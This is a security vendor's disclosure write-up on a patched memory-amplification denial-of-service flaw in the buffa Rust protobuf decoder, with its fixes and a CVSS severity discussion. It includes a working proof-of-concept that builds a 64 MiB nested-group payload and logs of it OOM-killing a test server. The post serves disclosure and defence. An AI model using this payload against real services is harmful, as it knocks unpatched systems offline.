When I pointed Endor Labs' AI SAST engine at buffa, Anthropic's Rust protobuf library, it flagged a vulnerable data flow I would not have prioritized from a quick read: an unknown-field decoder that allocates heap in proportion to attacker-controlled wire data. The engine called it a potential denial of service via excessive memory allocation. The proportional allocation the engine pointed at is real but modest, roughly 2x the input. Following the same function one branch further led to a second sink that amplifies a tiny input into a heap blow-up of about 22x, which is enough to OOM-kill a process whose memory cap sits well above any sane input-size limit.
buffa ships from Anthropic, the same lab that builds frontier models, including the recently released and un-released Mythos and Fable models, so it is about as close to model-assisted, heavily reviewed Rust as you will find. This flaw in the data flow still shipped, and was caught by our AI SAST security engine, following it end to end. The Anthropic team quickly responded to the disclosure and engaged in productive collaborative discourse on severity depending on deployment.
This is a good example of Endor Labs AI SAST earning its keep on a memory-safe language. The bug is an allocation-budget flaw on a forward-compatibility code path that every buffa-decoded message routes untrusted input through, and the engine found it by following data, not by pattern-matching a dangerous call.
Affected component #
Tracked as GHSA-f9qc-qg88-7pq5 / CVE-2026-55407, Moderate (CVSS 4.0 6.3). Any message decoded from untrusted input using code generated with preserve_unknown_fields=true
(the default) was affected.
The vulnerable code is decode_unknown_field in buffa/src/encoding.rs.
How AI SAST identified it #
The engine traced a length value parsed from wire data straight into a Vec<u8> allocation, with no bound between the two beyond fitting in a usize. It reported the flow stage by stage.
AI SAST output:
{
"ruleId": "AI SAST: Potential Denial of Service via excessive memory allocation due to large LengthDelimited field",
"level": "note",
"message": "decode_unknown_field allocates a Vec<u8> whose length is taken directly
from a length prefix (len) parsed from the input for WireType::LengthDelimited fields.
There is no upper bound on len beyond fitting into usize and the size of the provided
buffer. A caller can supply an arbitrarily large buffer whose contents specify an
arbitrarily large len, causing this function to attempt a very large allocation and
potentially exhaust memory, resulting in a denial of service.",
"locations": [{ "physicalLocation": {
"artifactLocation": { "uri": "buffa/src/encoding.rs" },
"region": { "startLine": 496 }
}}]
}
Identified data flow:
This is the part of AI SAST I have come to rely on. The engine did not just see a vec! and shrug. It established that len originates in untrusted input, that the only check between source and sink bounds the buffer rather than the allocation, and that the function is reachable from the default decode APIs. That is a real source-to-sink data flow on a memory-safe target, and it is the thread I pulled to amplify the second vector.
The flagged sink: unbounded flat allocation #
The engine pointed at the LengthDelimited
arm of decode_unknown_field
. Here it is verbatim, from vendor/buffa/src/encoding.rs lines 490 through 499
:
WireType::LengthDelimited => {
let len = decode_varint(buf)?;
let len = usize::try_from(len).map_err(|_| DecodeError::MessageTooLarge)?;
if buf.remaining() < len {
return Err(DecodeError::UnexpectedEof);
}
let mut data = alloc::vec![0u8; len]; // attacker-sized allocation
buf.copy_to_slice(&mut data);
UnknownFieldData::LengthDelimited(data)
}
len
comes off the wire and is used directly as the allocation size. The buf.remaining() < len
guard prevents an out-of-bounds read, but it does not cap the allocation. It only forces the attacker to actually deliver len
bytes. The function's own docstring acknowledges this and pushes the mitigation onto callers, at lines 463 through 468:
That guidance is the load-bearing assumption I ended up disproving. It holds for this flat sink, where a caller-side input-size cap really does bound the allocation at about 2x. It does not hold one branch down.
Following the flow further: ~22x amplification in the StartGroup arm #
The same function handles StartGroup
unknown fields, and that arm reads nested fields in a loop until it sees the matching EndGroup
. From lines 500 through 520:
WireType::StartGroup => {
let depth = depth
.checked_sub(1)
.ok_or(DecodeError::RecursionLimitExceeded)?; // bounds recursion DEPTH
let group_field_number = tag.field_number();
let mut nested = UnknownFields::new();
loop {
let nested_tag = Tag::decode(buf)?;
if nested_tag.wire_type() == WireType::EndGroup {
if nested_tag.field_number() != group_field_number {
return Err(DecodeError::InvalidEndGroup(nested_tag.field_number()));
}
break;
}
nested.push(decode_unknown_field(nested_tag, buf, depth)?); // per-tag UnknownField alloc
}
UnknownFieldData::Group(nested)
}
The checked_sub
bounds recursion depth, which stops a nested-group stack attack. It does nothing about field count inside a single group. Every loop iteration pushes an UnknownField
into nested.fields: Vec<UnknownField>
. On a 64-bit target an UnknownField
is about 40 bytes: a 4-byte field number, 4 bytes of padding, and a 32-byte UnknownFieldData
enum sized by its LengthDelimited(Vec<u8>)
and Group(UnknownFields) variants.
The cheapest nested field an attacker can encode is a varint with value zero, which is exactly 2 wire bytes: a 1-byte tag and a 1-byte zero. So each 2 bytes of input produces a roughly 40-byte heap structure. That is a 20x amplification on the structures alone, plus about another 1.5x transient while the backing Vec doubles during growth. A 64 MiB payload of zero varints inside one unknown group drives the decoder to roughly 1.4 GB of heap.
The wire payload is trivial:
The receiving message type does not need to declare a group field. Protobuf forward-compatibility routes every unknown wire type through decode_unknown_field, so any concrete buffa-decoded message is exploitable. My POC uses google.protobuf.Empty precisely because it has zero defined fields, which makes the wire-level analysis unambiguous.
Reachable from the default APIs #
The convenience methods feed this code path with no allocation budget. From vendor/buffa/src/message.rs
lines 183 through 190:
fn decode_from_slice(mut data: &[u8]) -> Result<Self, DecodeError>
where
Self: Sized,
{
Self::decode(&mut data)
}
Message::decode, Message::decode_from_slice
, and MessageView::decode_view
all reach the vulnerable sinks. The explicit DecodeOptions type does cap top-level message length, but the default is DEFAULT_MAX_MESSAGE_SIZE = 0x7FFF_FFFF
, roughly 2 GiB, which is far too high to matter, and more importantly it caps input length only. It never sees the group-amplification blow-up, because that vector starts from a small input that expands during decode.
Validating it: from "survives" to OOM-kill #
I built a self-contained Cargo workspace with a POC server and attacker, vendoring buffa and buffa-types verbatim so the result is reproducible without any network access. The attacker constructs the group-amplification payload in build_group_amp
. The programmatic core is just this:
use buffa::Message;
use buffa_types::Empty;
let nested_count = 33_554_431_usize;
let mut payload: Vec<u8> = Vec::with_capacity(2 * nested_count + 2);
payload.push(0x0b); // StartGroup, field 1
for _ in 0..nested_count {
payload.extend_from_slice(&[0x08, 0x00]); // varint tag, value 0
}
payload.push(0x0c); // EndGroup, field 1
// Server side: ~1.4 GB heap from a 64 MiB input. ~22x.
let _ = Empty::decode_from_slice(&payload);
Under Docker with the server capped at 256 MiB, the 64 MiB payload OOM-kills it:
poc-server-crash | [server] reading 67108864 byte payload
poc-server-crash | [server] payload read; input buffer = 67108864 bytes
poc-server-crash | [server] calling decode...
[poc-server-crash exited with code 137]
Exit 137 with OOMKilled: true
confirms the kill. The measured results separate the two sinks cleanly:
Why the docstring's advice is not enough #
The mitigation the function delegates to callers, "limit the input buffer size," is exactly the control the amplification vector defeats. A 64 MiB input cap still permits roughly 1.4 GB of allocation. The defensive perimeter has to move from the caller into the decoder. The minimum fix is a per-group nested-field count cap, which bounds worst-case amplification at a few hundred KiB per group:
WireType::StartGroup => {
let depth = depth.checked_sub(1).ok_or(DecodeError::RecursionLimitExceeded)?;
let group_field_number = tag.field_number();
let mut nested = UnknownFields::new();
let mut count = 0usize;
loop {
let nested_tag = Tag::decode(buf)?;
if nested_tag.wire_type() == WireType::EndGroup { /* ... */ break; }
count += 1;
if count > MAX_UNKNOWN_FIELDS_PER_MESSAGE {
return Err(DecodeError::TooManyUnknownFields);
}
nested.push(decode_unknown_field(nested_tag, buf, depth)?);
}
UnknownFieldData::Group(nested)
}
The more robust fix is to thread a global allocation budget through DecodeOptions
and deduct from it on every heap allocation, both the LengthDelimited
bytes and the UnknownField
slots, so both vectors and any future amplification path are caught by one control. The convenience methods should then call through DecodeOptions::default()
with a realistic budget (64 MiB matches prost's default) rather than the current 2 GiB. Once those land, the docstring should be corrected, since input-size caps are not a sufficient mitigation for the group vector.
What shipped
The fix landed in buffa and connectrpc 0.8.0. It enforces a per-message unknown-field count limit, configurable, defaulting to 1 million unknown fields, which caps allocation overhead at roughly 40 MiB per message. That is the count-cap approach above, applied as a general per-message control rather than only to the group arm. Users who cannot upgrade immediately have a second option: regenerate their code with preserve_unknown_fields=false
, which removes the unknown-field retention that feeds the sink entirely.
Impact: why severity depends on the deployment #
The most interesting part of this finding is that it does not have a single correct severity. The amplification ratio is a fixed property of the code, but whether that ratio translates into a momentary blip or a critical outage depends entirely on how the consuming service is built. I think it is worth laying out that spectrum explicitly, because a reader running buffa needs to score it against their own architecture rather than inherit anyone else's number.
The two sinks sit at different points on that spectrum to begin with. The flat LengthDelimited sink is roughly 2x and is genuinely bounded by a transport-level input-size cap, so I am comfortable with it sitting around the 6.3 (Medium) that was assigned. A caller who caps input at, say, 4 MiB has bounded the allocation at about 8 MiB, and that is the end of it. The group-amplification sink is the one where severity moves, because the ~22x factor breaks the assumption that an input cap bounds memory.
Here is the same vulnerability across deployment profiles, from least to most severe:
The nuance I pressed during disclosure is that the two metrics driving the score, attack requirements and availability impact, are both deployment-dependent for the amplification vector, and the favorable reading is not the general case.
On attack requirements: the justification for treating exploitation as conditional was that it needs the library deployed on an externally-reachable decode path with the input-size limit raised above the default. For the amplification vector specifically, that is the exact condition the bug defeats. The attacker does not need a raised cap; they need cap × 22 > available memory, which holds under common defaults. A 4 MB gRPC limit is already enough. So for that vector I would argue the requirements stay low rather than becoming a meaningful precondition, and that network reachability is already captured once by the attack-vector metric rather than a second time as an added requirement.
On availability: scoring it as a transient single-worker crash assumes effective rate-limiting on the decode path and automatic recovery that actually recovers. The trigger here is small, unauthenticated, and perfectly repeatable, so a worker that auto-restarts can be driven straight back into another OOM. That is a crash-loop, which reads as sustained unavailability rather than graceful degradation, and the library does not itself provide the rate-limiting that would prevent it.
None of this is a disagreement that 6.3 is correct for a specific, well-supervised, rate-limited deployment. It is an argument that the same code reaches the High-to-Critical range for the file-ingestion and default-gRPC profiles, and that consumers should score the vector against their own concurrency limits, memory headroom, and recovery behavior. That is also the case for a CVE: a tracked identifier lets each consumer evaluate their own exposure instead of assuming the most favorable deployment.
Disclosure #
I reported both vectors to Anthropic through their bug bounty program, and the experience was genuinely collaborative from start to finish. The team validated the report quickly, confirmed both vectors reproduce as described, and explicitly agreed the group-amplification analysis was correct. When I pushed back on the initial rescore, they did not wave it off. They walked me through exactly which CVSS 4.0 metrics they were using and the deployment assumptions behind each one, which is precisely the kind of transparent, technical back-and-forth that makes coordinated disclosure work well. We did not land in the same place on every metric, but the disagreement was substantive and respectful on both sides, and I came away with a clear understanding of their reasoning.
Anthropic scored the issue against their own deployment profile, multiple supervised replicas with automatic restart, and settled on CVSS 4.0 6.3 (Moderate) with a $600 bounty. They shipped the fix in buffa and connectrpc 0.8.0, requested a CVE, and the issue is now tracked as GHSA-f9qc-qg88-7pq5 and CVE-2026-55407. Throughout, the team was responsive, willing to engage on the hard scoring questions, and accommodating on disclosure timing and CVE tracking. It is a good example of a vendor security team treating an external researcher as a partner, and I appreciated working with them on it.
Takeaway #
What I want to highlight is the workflow. AI SAST established a true data flow from untrusted wire bytes to an unbounded allocation on a path reachable from the default API, on a memory-safe Rust target where there is no overflow to grep for. That is the hard part of triage. Following that flow one branch further, into the group decoder, is where the 22x amplification lived. The engine put me on the function that mattered, and the rest was validation.
That it found this in buffa, a library from a frontier-model lab developed by their own models, is its own small comment on the value of analysis built specifically to trace untrusted data to dangerous sinks. One DoS in one library does not prove much on its own. But the path from source to sink was there to be found, and the tool built for that job is the one that found it.
What's next?
When you're ready to take the next step in securing your software supply chain, here are 3 ways Endor Labs can help: